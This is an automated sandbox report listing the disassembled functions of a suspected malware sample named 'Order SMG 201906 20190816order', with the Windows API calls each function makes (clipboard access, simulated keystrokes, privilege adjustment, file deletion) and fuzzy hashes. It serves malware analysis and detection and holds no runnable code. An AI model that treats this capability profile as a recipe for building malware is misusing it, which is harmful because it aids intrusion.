Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: aa9df2f1f3d3afe1309460d4fe78f022ae08662da92f8d56ef81b65362027b2c
Instruction ID: 74f35774a27debaa66b6be3da2798f9a4b53b6784b46458f95cdd3b3f822c893
Opcode Fuzzy Hash: aa9df2f1f3d3afe1309460d4fe78f022ae08662da92f8d56ef81b65362027b2c
Instruction Fuzzy Hash: 65F0A0B0605301CFCB349F60D484816B7F0BF443653208ABFF2C692650C3399840DF44

Function 004040A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004040C6

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 9d95857b7837f52a5ea900d0463dd10bf0ab9cd554c9ff5156831bebcfff610c
Instruction ID: 0290631fc8dec078d58f0ec9d0cf7d10399dccf95bf213d32d7819efeea1db69
Opcode Fuzzy Hash: 9d95857b7837f52a5ea900d0463dd10bf0ab9cd554c9ff5156831bebcfff610c
Instruction Fuzzy Hash: 9BE07D326001241BC711A254CC46FEE73ACDF8C6A4F050079F905E3244DA7499808794

Function 00DF9E28 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?), ref: 00DF9E33

Memory Dump Source

Source File: 00000000.00000002.1695136814.0000000000DF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df9000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: b3e4e0e4c0843800d2d0553475bfbd30e80c164e92f900c30f3bea81da9d36b4
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 68E08C30D0620CEBCB10CBA88D54BB9B3A8AB04320F108664FA1AC3280E5309E08E660

Function 00DF9DF8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?), ref: 00DF9E03

Memory Dump Source

Source File: 00000000.00000002.1695136814.0000000000DF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df9000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 3e48433fdc4b805e1df6fc6db0860616661ade71c8bda45f7e6ea42b5444079e
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 86D0A731D0620CFBCB20CFB49D04AEDB3A8D709320F108754FE15C3280D6319D5097A0

Function 00DFB7F4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 00DFB809

Memory Dump Source

Source File: 00000000.00000002.1695136814.0000000000DF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df9000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: a5fa4a1670aa0a8c3f76249b1d6d9b4339a31fab6a3f047b2bc86c55638f4c48
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 33E09A7494010DAFDB00DFA8D5496AD7BB4EF04311F1045A1FE0597680DB309A548A62

Function 00DFB7F8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 00DFB809

Memory Dump Source

Source File: 00000000.00000002.1695136814.0000000000DF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df9000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 04aa6bcb588b5a82206581652318ce880c73e75d70a7fbd8256d6d3eb4a37d25
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: A2E0E67494010DDFDB00DFB8D5496AD7BF4EF04311F104161FD01D2280D7309D508A72

Non-executed Functions

Function 0046F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0046F87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046F8DC
GetWindowLongW.USER32(?,000000F0), ref: 0046F919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0046F940
SendMessageW.USER32 ref: 0046F966
_wcsncpy.LIBCMT ref: 0046F9D2
GetKeyState.USER32(00000011), ref: 0046F9F3
GetKeyState.USER32(00000009), ref: 0046FA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046FA16
GetKeyState.USER32(00000010), ref: 0046FA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0046FA4F
SendMessageW.USER32 ref: 0046FA72
SendMessageW.USER32(?,00001030,?,0046E059), ref: 0046FB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0046FB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0046FB96
SetCapture.USER32(?), ref: 0046FB9F
ClientToScreen.USER32(?,?), ref: 0046FC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0046FC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0046FC29
ReleaseCapture.USER32 ref: 0046FC34
GetCursorPos.USER32(?), ref: 0046FC69
ScreenToClient.USER32(?,?), ref: 0046FC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 0046FCD8
SendMessageW.USER32 ref: 0046FD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 0046FD41
SendMessageW.USER32 ref: 0046FD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0046FD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0046FD8F
GetCursorPos.USER32(?), ref: 0046FDB0
ScreenToClient.USER32(?,?), ref: 0046FDBD
GetParent.USER32(?), ref: 0046FDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 0046FE3F
SendMessageW.USER32 ref: 0046FE6F
ClientToScreen.USER32(?,?), ref: 0046FEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0046FEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0046FF19
SendMessageW.USER32 ref: 0046FF3C
ClientToScreen.USER32(?,?), ref: 0046FF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0046FFB6
GetWindowLongW.USER32(?,000000F0), ref: 0047004B

Strings

F, xrefs: 0046FF42
@GUI_DRAGID, xrefs: 0046FBCC

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: 513e673a684085903af3a68e9cc20ba3dff9b5133ba034c09a2775dd4a1645ce
Instruction ID: cc02e03bbf0bf54211185d3ef7d393deee0c208a90fc515681584bca93a84043
Opcode Fuzzy Hash: 513e673a684085903af3a68e9cc20ba3dff9b5133ba034c09a2775dd4a1645ce
Instruction Fuzzy Hash: 3832CA70604244EFDB10DF64D880FAABBA4FF49358F040A6AF695872A1E734DC49CB5A

Function 0046AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0046B1CD

Strings

%d/%02d/%02d, xrefs: 0046AEFC

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: d72706a9410115efe04fcad9763c369cf006413e6ceaf8e74eeb315c7acb5c10
Instruction ID: 34171e6ab594a03bc3671029e554b35f8d6d1caf128c67eefd81c7f472873446
Opcode Fuzzy Hash: d72706a9410115efe04fcad9763c369cf006413e6ceaf8e74eeb315c7acb5c10
Instruction Fuzzy Hash: 5812BF71600218ABEB248F65CC49FAF7BB4FF45710F10412BF915EA2D1EB789942CB5A

Function 0041EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0041EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00473AEA
IsIconic.USER32(000000FF), ref: 00473AF3
ShowWindow.USER32(000000FF,00000009), ref: 00473B00
SetForegroundWindow.USER32(000000FF), ref: 00473B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00473B20
GetCurrentThreadId.KERNEL32 ref: 00473B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00473B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00473B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00473B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 00473B54
SetForegroundWindow.USER32(000000FF), ref: 00473B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B6C
keybd_event.USER32(00000012,00000000), ref: 00473B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B81
keybd_event.USER32(00000012,00000000), ref: 00473B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B8F
keybd_event.USER32(00000012,00000000), ref: 00473B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B9E
keybd_event.USER32(00000012,00000000), ref: 00473BA3
SetForegroundWindow.USER32(000000FF), ref: 00473BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00473BCD

Strings

Shell_TrayWnd, xrefs: 00473AE5

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 9641c01d01e40d42ee8f5cf71437ba4774e896593e718536b9572676ccf2a4f5
Instruction ID: 1542eb62d84d10236645d43e5eed5a01f98071e92a17b919d6b928d05aac1c3f
Opcode Fuzzy Hash: 9641c01d01e40d42ee8f5cf71437ba4774e896593e718536b9572676ccf2a4f5
Instruction Fuzzy Hash: 68319871E402187BEB206F758C49FBF7F6CEB44B50F10442AFA05EA1D1D6B46D01ABA8

Function 0043ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0043B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0043B180
Part of subcall function 0043B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0043B1AD
Part of subcall function 0043B134: GetLastError.KERNEL32 ref: 0043B1BA

_memset.LIBCMT ref: 0043AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0043AD5A
CloseHandle.KERNEL32(?), ref: 0043AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0043AD82
GetProcessWindowStation.USER32 ref: 0043AD9B
SetProcessWindowStation.USER32(00000000), ref: 0043ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0043ADBF

Part of subcall function 0043AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0043AB99
Part of subcall function 0043AB84: CloseHandle.KERNEL32(?), ref: 0043ABAB

Strings

winsta0, xrefs: 0043AD7D
default, xrefs: 0043ADBA
, xrefs: 0043AD17
H*K, xrefs: 0043AE40

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $H*K$default$winsta0
API String ID: 2063423040-3138276786
Opcode ID: cc780bf8ea40b4313f64aa3df155e18326dd0ae762a0031b39a12de5993723b7
Instruction ID: f7ddd2b72f6753a7b4a817440186c9bb792b9598968c157161328d8252a4d608
Opcode Fuzzy Hash: cc780bf8ea40b4313f64aa3df155e18326dd0ae762a0031b39a12de5993723b7
Instruction Fuzzy Hash: 8581B271841209AFDF11DFA4CC45AEF7B79EF08308F04512AF964A22A1D7398E64DB69

Function 004460DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00445FA6,?), ref: 00446ED8

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00445FA6,?), ref: 00446EF1

Part of subcall function 0044725E: __wsplitpath.LIBCMT ref: 0044727B
Part of subcall function 0044725E: __wsplitpath.LIBCMT ref: 0044728E

Part of subcall function 004472CB: GetFileAttributesW.KERNEL32(?,00446019), ref: 004472CC

_wcscat.LIBCMT ref: 00446149
_wcscat.LIBCMT ref: 00446167
__wsplitpath.LIBCMT ref: 0044618E
FindFirstFileW.KERNEL32(?,?), ref: 004461A4
_wcscpy.LIBCMT ref: 00446209
_wcscat.LIBCMT ref: 0044621C
_wcscat.LIBCMT ref: 0044622F
lstrcmpiW.KERNEL32(?,?), ref: 0044625D
DeleteFileW.KERNEL32(?), ref: 0044626E
MoveFileW.KERNEL32(?,?), ref: 00446289
MoveFileW.KERNEL32(?,?), ref: 00446298
CopyFileW.KERNEL32(?,?,00000000), ref: 004462AD
DeleteFileW.KERNEL32(?), ref: 004462BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 004462E1
FindClose.KERNEL32(00000000), ref: 004462FD
FindClose.KERNEL32(00000000), ref: 0044630B

Strings

\*.*, xrefs: 00446138, 00446147, 00446165

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: d13f31206347c16688133b179fd0511736ac8aab39ef4f41029cc2fa49194ad5
Instruction ID: 576119141936947d833fd61f7edd2ffd4573d9f7455e634e106dfa8bb1cf487e
Opcode Fuzzy Hash: d13f31206347c16688133b179fd0511736ac8aab39ef4f41029cc2fa49194ad5
Instruction Fuzzy Hash: E8514EB290911C6ADB21FB92CC44DDF77BCBF05304F0604EBE585E2141DA7A9B498FA9

Function 00456B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0049DC00), ref: 00456B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00456B44
GetClipboardData.USER32(0000000D), ref: 00456B4C
CloseClipboard.USER32 ref: 00456B58
GlobalLock.KERNEL32(00000000), ref: 00456B74
CloseClipboard.USER32 ref: 00456B7E
GlobalUnlock.KERNEL32(00000000), ref: 00456B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00456BA0
GetClipboardData.USER32(00000001), ref: 00456BA8
GlobalLock.KERNEL32(00000000), ref: 00456BB5
GlobalUnlock.KERNEL32(00000000), ref: 00456BE9
CloseClipboard.USER32 ref: 00456CF6

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 8b3f17b06824b7c20c25190885108a70b5aff585da82bc99f0ed49c0e182e786
Instruction ID: af531d0f1bbe7b8bfe1797fa9ce5f20198d32dc50305d45d4a3bf409fa3c8eaa
Opcode Fuzzy Hash: 8b3f17b06824b7c20c25190885108a70b5aff585da82bc99f0ed49c0e182e786
Instruction Fuzzy Hash: 7051A371600205ABD301AF61DC86F6F77A8AF44B15F41053EF946E72D1DF78E8098B6A

Function 0044F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0044F62B
FindClose.KERNEL32(00000000), ref: 0044F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 0044F6E2
__swprintf.LIBCMT ref: 0044F72E
__swprintf.LIBCMT ref: 0044F767
__swprintf.LIBCMT ref: 0044F7BB

Part of subcall function 0042172B: __woutput_l.LIBCMT ref: 00421784

__swprintf.LIBCMT ref: 0044F809
__swprintf.LIBCMT ref: 0044F858
__swprintf.LIBCMT ref: 0044F8A7
__swprintf.LIBCMT ref: 0044F8F6

Strings

%02d, xrefs: 0044F7B0, 0044F7B9, 0044F807, 0044F856, 0044F8A5, 0044F8F4
%4d, xrefs: 0044F761
%4d%02d%02d%02d%02d%02d, xrefs: 0044F728

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 719a001bf592241279936c11551fac8019408ba57f3921e8acc488db3792300a
Instruction ID: e510ffb9b02b73ead12ea0b874c1ae6f3865531047a677e0e71b89571ef03704
Opcode Fuzzy Hash: 719a001bf592241279936c11551fac8019408ba57f3921e8acc488db3792300a
Instruction Fuzzy Hash: 31A122B2504344ABD310EBA5C985DAFB7ECAF98704F400D2FF585D2192EB38D949CB66

Function 00451B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00451B50
_wcscmp.LIBCMT ref: 00451B65
_wcscmp.LIBCMT ref: 00451B7C
GetFileAttributesW.KERNEL32(?), ref: 00451B8E
SetFileAttributesW.KERNEL32(?,?), ref: 00451BA8
FindNextFileW.KERNEL32(00000000,?), ref: 00451BC0
FindClose.KERNEL32(00000000), ref: 00451BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 00451BE7
_wcscmp.LIBCMT ref: 00451C0E
_wcscmp.LIBCMT ref: 00451C25
SetCurrentDirectoryW.KERNEL32(?), ref: 00451C37
SetCurrentDirectoryW.KERNEL32(004B39FC), ref: 00451C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 00451C5F
FindClose.KERNEL32(00000000), ref: 00451C6C
FindClose.KERNEL32(00000000), ref: 00451C7C

Strings

*.*, xrefs: 00451BE2

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 92de58b19114773358e09430fdba1132c0a7fc7ca095cb66b27fabd43ed0e6cc
Instruction ID: 6aad74260d3ea97454239cf74b6c66882def0d618beb8bb6cc3249350132f1c5
Opcode Fuzzy Hash: 92de58b19114773358e09430fdba1132c0a7fc7ca095cb66b27fabd43ed0e6cc
Instruction Fuzzy Hash: 4831D6319012196BCF11AFA19C88BDF77AC9F05321F1005ABFC11E21A1EB78DA49CB6C

Function 00451C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00451CAB
_wcscmp.LIBCMT ref: 00451CC0
_wcscmp.LIBCMT ref: 00451CD7

Part of subcall function 00446BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00446BEF

FindNextFileW.KERNEL32(00000000,?), ref: 00451D06
FindClose.KERNEL32(00000000), ref: 00451D11
FindFirstFileW.KERNEL32(*.*,?), ref: 00451D2D
_wcscmp.LIBCMT ref: 00451D54
_wcscmp.LIBCMT ref: 00451D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 00451D7D
SetCurrentDirectoryW.KERNEL32(004B39FC), ref: 00451D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00451DA5
FindClose.KERNEL32(00000000), ref: 00451DB2
FindClose.KERNEL32(00000000), ref: 00451DC2

Strings

*.*, xrefs: 00451D28

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

